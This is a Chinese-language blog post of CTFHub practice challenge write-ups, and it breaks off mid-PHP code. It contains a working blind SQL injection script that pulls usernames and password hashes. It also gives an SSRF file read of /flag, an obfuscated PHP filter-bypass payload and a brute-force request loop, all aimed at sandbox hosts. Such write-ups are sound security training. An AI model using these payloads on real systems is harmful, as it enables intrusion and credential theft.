CTFHUB历年真题练习

最新推荐文章于 2024-09-21 15:38:27 发布

_pain_

最新推荐文章于 2024-09-21 15:38:27 发布

阅读量1.4k

点赞数 1

分类专栏： web做题记录文章标签： php sql postgresql

本文链接：https://blog.csdn.net/qq_51558360/article/details/120423145

版权

WebsiteManger

考点

布尔盲注、SSRF

尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上
在这里插入图片描述
盲注脚本

import string

from requests import *
allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

myurl = 'http://challenge-1993bf8242925716.sandbox.ctfhub.com:10800/image.php'

info = ''
for i in range(1,50):
    for s in allstr:
        payload = '?id=if(ascii(mid((select/**/group_concat(username,password)/**/from/**/ctf.users),{},1))={},1,5)'.format(i,ord(s))
        resp = get(url=myurl+payload)
        if len(resp.text) > 4000:
             info += s
             print(info)

在这里插入图片描述
利用布尔盲注得到用户密码：7feaa258b32f2ddbc4f32a6aed6c5b37，用户名为：admin
登录进去：

ssrf猜测 flag在根目录下：file:///flag
在这里插入图片描述

hate_php

在这里插入图片描述
阅读源码发现过滤掉了f l a g . p h / ; " ’ ` | [ ] _ =这些字符，并且还有一些黑名单函数。这让我联想到了P神的一篇文章无数字、字母构造webshell (https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html)

下面就是要通过该方法构造一些黑名单之外的函数来读取flag.php中的内容。
这边好像过滤的不怎么严格直接构造 highlight_file(flag.php)即可读到flag
在这里插入图片描述

?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~(%99%93%9E%98%D1%8F%97%8F))

random

在这里插入图片描述
此题为随机验证下一个数字的值

import requests
import re

url = 'http://challenge-9d9782aa29d71d3a.sandbox.ctfhub.com:10800/index.php?num=22'
while True:
    try:
        r = requests.get(url)

        # 匹配平台flag格式
        flag = re.search(r'ctfhub\{.+\}', r.text).group()
    except AttributeError:
        print('未获取到flag！ 正在重试！')
    else:
        print(flag)
        break

脚本解析：
无限循环提交请求，直到页面中存在以ctfhub{}格式的flag跳出循环。
在这里插入图片描述
也可手动刷新页面，直到出现flag。

逆转思维

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
   
    echo "<br><h1>".file_get_contents($text,'r').